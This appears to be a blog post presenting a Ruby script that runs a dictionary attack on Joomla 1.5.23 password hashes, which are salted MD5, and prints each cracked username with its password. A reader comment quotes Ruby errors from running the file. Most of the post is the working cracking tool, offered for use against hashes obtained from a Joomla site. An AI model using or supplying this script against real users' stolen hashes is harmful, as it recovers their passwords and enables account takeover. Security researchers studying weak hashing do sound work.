Once in possession of this information it is possible to perform a dictionary attack against these hashes using a simple ruby script to get users password.
The first parameter is the dictionary file and the second is the hash file in the following format: user;hash;salt
Tested on Joomla Version 1.5.23
#!/usr/bin/env ruby
require 'digest/md5'
def JoomlaCrack(key, hash, salt)
if (generateJoomlaHash(key,salt) == hash)
return true
else
return false
end
end
def generateJoomlaHash(pKey,pSalt)
return Digest::MD5.hexdigest(pKey + pSalt);
end
def run(fDic,fHash)
begin
founds = Hash.new()
fDic.each do |key|
File.open(fHash,'r').each do |line|
name,hash,salt = line.split(';')
name.to_s.chomp!
hash.to_s.chomp!
salt.to_s.chomp!
key.to_s.chomp!
if founds.include?(name)
next
else
if JoomlaCrack(key, hash, salt)
puts "#{name}:#{key}"
founds[name] = key
next
else
next
end
end
end
end
fDic.close
# puts founds.inspect
end
end
fDic = File.open(ARGV[0],'r')
fHash = ARGV[1]
run(fDic,fHash)
Um comentário:
jm.rb:1: Invalid char `\357' in expression
jm.rb:1: Invalid char `\273' in expression
jm.rb:1: Invalid char `\277' in expression
Postar um comentário